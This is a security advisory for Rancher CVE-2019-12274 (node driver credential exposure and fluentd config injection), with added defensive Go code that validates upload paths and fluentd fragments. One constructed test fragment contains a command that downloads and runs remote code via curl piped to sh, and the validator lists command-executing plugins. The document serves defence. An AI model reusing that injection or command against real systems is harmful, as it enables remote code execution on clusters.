PT-2019-12727 · Rancher · Rancher

Published

2019-06-06

·

Updated

2024-08-20

·

CVE-2019-12274

CVSS v3.1

8.8

High

Vector

AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Name of the Vulnerable Software and Affected Versions

Rancher 1, and Rancher 2 through 2.2.3
Description

Two related weaknesses are covered here. First, an unprivileged user who is allowed to deploy nodes can gain admin access to the Rancher management plane. Node driver options intentionally allow the contents of certain files to be posted to the cloud provider, and nothing stops the user from pointing such an option at a sensitive file on the management server (for example a kubeconfig), so the management plane's own credentials are shipped to the cloud provider, from where the user can retrieve them. This is the issue tracked as CVE-2019-12274. Second, in Rancher 2 a project owner can inject additional fluentd logging configuration, which makes it possible to read files or execute arbitrary commands inside the fluentd container; that issue is tracked separately (see Related Identifiers).
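The node driver issue above comes down to a path-valued option being read from the management server's file system on the user's behalf. The Go program below is an added example, not Rancher's code and not the fix that shipped: it shows the confinement check a management plane needs before reading such a file, keeping every user-supplied path inside a per-user upload directory and rejecting absolute paths, `..` escapes and symlinks that resolve elsewhere. The function names, the directory layout and the placeholder files are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// resolveUploadPath confines a path-valued node driver option to uploadDir.
// A caller may only name files it previously uploaded there: absolute paths,
// ".." escapes and symlinks that leave uploadDir are rejected, so a
// management-plane file can never be selected for shipping to the cloud.
// (Hypothetical helper for this example, not a Rancher API.)
func resolveUploadPath(uploadDir, userPath string) (string, error) {
	if userPath == "" || filepath.IsAbs(userPath) {
		return "", fmt.Errorf("option value %q must be a relative path", userPath)
	}
	root, err := filepath.Abs(uploadDir)
	if err != nil {
		return "", err
	}
	// Resolve the root itself so later prefix checks compare real paths.
	root, err = filepath.EvalSymlinks(root)
	if err != nil {
		return "", err
	}
	// Join cleans the result, so "keys/../../x" collapses before the check.
	candidate := filepath.Join(root, userPath)
	if !strings.HasPrefix(candidate, root+string(filepath.Separator)) {
		return "", fmt.Errorf("option value %q escapes the upload directory", userPath)
	}
	// Follow symlinks: the real target must still sit inside the real root.
	target, err := filepath.EvalSymlinks(candidate)
	if err != nil {
		return "", err
	}
	if !strings.HasPrefix(target, root+string(filepath.Separator)) {
		return "", fmt.Errorf("option value %q resolves outside the upload directory", userPath)
	}
	info, err := os.Stat(target)
	if err != nil {
		return "", err
	}
	if !info.Mode().IsRegular() {
		return "", fmt.Errorf("option value %q is not a regular file", userPath)
	}
	return target, nil
}

// scenarios builds a scratch upload directory (constructed test data) holding
// one legitimate upload and one symlink that escapes it, then reports which
// constructed option values resolveUploadPath accepts, keyed by scenario name.
func scenarios() (map[string]bool, error) {
	root, err := os.MkdirTemp("", "uploads-")
	if err != nil {
		return nil, err
	}
	defer os.RemoveAll(root)
	outside, err := os.MkdirTemp("", "outside-")
	if err != nil {
		return nil, err
	}
	defer os.RemoveAll(outside)

	// Stand-in for a management-plane credential file (constructed, not real).
	secret := filepath.Join(outside, "kubeconfig")
	if err := os.WriteFile(secret, []byte("constructed placeholder"), 0o600); err != nil {
		return nil, err
	}
	if err := os.MkdirAll(filepath.Join(root, "keys"), 0o700); err != nil {
		return nil, err
	}
	if err := os.WriteFile(filepath.Join(root, "keys", "id_rsa.pub"), []byte("ssh-ed25519 AAAA constructed"), 0o600); err != nil {
		return nil, err
	}
	if err := os.Symlink(secret, filepath.Join(root, "escape")); err != nil {
		return nil, err
	}

	inputs := map[string]string{
		"legitimate": "keys/id_rsa.pub",
		"absolute":   secret,
		"dotdot":     filepath.Join("..", filepath.Base(outside), "kubeconfig"),
		"symlink":    "escape",
	}
	accepted := make(map[string]bool, len(inputs))
	for name, p := range inputs {
		_, err := resolveUploadPath(root, p)
		accepted[name] = err == nil
	}
	return accepted, nil
}

func main() {
	accepted, err := scenarios()
	if err != nil {
		fmt.Println("setup failed:", err)
		os.Exit(1)
	}
	for name, ok := range accepted {
		fmt.Printf("%-10s accepted=%v\n", name, ok)
	}
}
```

Only the legitimate upload is accepted; the absolute path, the `..` traversal and the symlink are all refused. The symlink case is the one a lexical check alone misses, which is why the real target is resolved and compared against the resolved root.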
Recommendations

Upgrade. Rancher 2.2.4 fixes both issues on the 2.x line, and a patched Rancher 1.6 release was published for the node driver issue on Rancher 1. Where an upgrade is not immediately possible: for Rancher 1 and Rancher 2 through 2.2.3, restrict node deployment (node templates and node drivers) to trusted users, because any user who can deploy a node can trigger the file posting; for Rancher 2 through 2.2.3, do not grant the project owner role to untrusted users, or disable project logging until the upgrade is done, because the extra fluentd configuration is injected through the project logging settings and leads to file reads and arbitrary command execution inside the fluentd container.
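For the fluentd issue the risk is that a project owner's configuration text is spliced verbatim into a generated `<match>` block, so a fragment can close that block and open one of its own. The Go program below is an added example (not Rancher's code and not its actual fix) of a validator for such a fragment: it rejects lines that close the enclosing block or open sections the owner may not create, and it rejects plugin types and directives that execute commands or read files. The allowed-section and forbidden-plugin lists, the function names and the two sample fragments are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// Finding is one rejected line of a user-supplied fluentd fragment.
type Finding struct {
	Line   int
	Reason string
}

var (
	// <name ...> or </name>; fluentd section tags occupy a whole line.
	tagRe = regexp.MustCompile(`^<(/?)([A-Za-z_]+)[^>]*>$`)
	// Nested sections an output block legitimately needs (assumed allowlist).
	allowedSections = map[string]bool{"buffer": true, "format": true, "inject": true, "server": true}
	// Plugin types that spawn processes or read files inside the container.
	forbiddenTypes = map[string]string{
		"exec":        "spawns a process",
		"exec_filter": "spawns a process",
		"tail":        "reads files inside the container",
	}
	// Directives that do the same regardless of plugin type.
	forbiddenKeys = map[string]string{
		"command":  "spawns a process",
		"@include": "reads arbitrary files into the config",
		"include":  "reads arbitrary files into the config",
	}
)

// CheckFluentdFragment validates a fragment that the management plane would
// splice into the body of one <match> block. An empty result means the
// fragment may be spliced in. (Hypothetical validator for this example.)
func CheckFluentdFragment(fragment string) []Finding {
	var findings []Finding
	depth := 0 // nesting below the enclosing <match>; never allowed to go negative
	for i, raw := range strings.Split(fragment, "\n") {
		n := i + 1
		line := strings.TrimSpace(raw)
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		if m := tagRe.FindStringSubmatch(line); m != nil {
			closing, name := m[1] == "/", strings.ToLower(m[2])
			switch {
			case closing && depth == 0:
				findings = append(findings, Finding{Line: n, Reason: "closes the enclosing block: " + line})
			case closing:
				depth--
			case !allowedSections[name]:
				findings = append(findings, Finding{Line: n, Reason: "section not permitted in a fragment: " + line})
			default:
				depth++
			}
			continue
		}
		fields := strings.Fields(line)
		key, value := strings.ToLower(fields[0]), strings.Join(fields[1:], " ")
		if key == "@type" || key == "type" {
			if why, bad := forbiddenTypes[strings.ToLower(value)]; bad {
				findings = append(findings, Finding{Line: n, Reason: fmt.Sprintf("plugin %q %s", value, why)})
			}
			continue
		}
		if why, bad := forbiddenKeys[key]; bad {
			findings = append(findings, Finding{Line: n, Reason: fmt.Sprintf("directive %q %s", key, why)})
		}
	}
	if depth != 0 {
		findings = append(findings, Finding{Line: 0, Reason: "unclosed section in fragment"})
	}
	return findings
}

// Constructed sample fragments: a benign forward output, and an injection that
// closes the enclosing <match> and opens a command-executing output of its own.
const benignFragment = `@type forward
<server>
  host 10.0.0.5
  port 24224
</server>
<buffer>
  flush_interval 5s
</buffer>`

const injectedFragment = `host 10.0.0.5
port 24224
</match>
<match **>
  @type exec
  command curl -s http://198.51.100.7/x | sh
  <format>
    @type json
  </format>
</match>`

func main() {
	for _, c := range []struct{ name, frag string }{{"benign", benignFragment}, {"injected", injectedFragment}} {
		findings := CheckFluentdFragment(c.frag)
		fmt.Printf("%s: %d finding(s)\n", c.name, len(findings))
		for _, f := range findings {
			fmt.Printf("  line %d: %s\n", f.Line, f.Reason)
		}
	}
}
```

The benign fragment passes; the injected one produces five findings (the stray `</match>`, the new `<match **>`, the `exec` plugin, the `command` directive, and the final `</match>`). Treating the owner's text as a fragment confined to one block, rather than as trusted configuration, is the property that matters; a stricter design accepts structured fields instead of free-form fluentd text at all.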

Weakness Enumeration

CWE-668 Exposure of Resource to Wrong Sphere

CWE-862 Missing Authorization

CWE-75 Special Elements Injection

Related Identifiers

CVE-2019-12274
GHSA-53PJ-67M4-9W98
GHSA-GC62-J469-9GJM
GO-2023-1991
GO-2024-2762

Affected Products

Rancher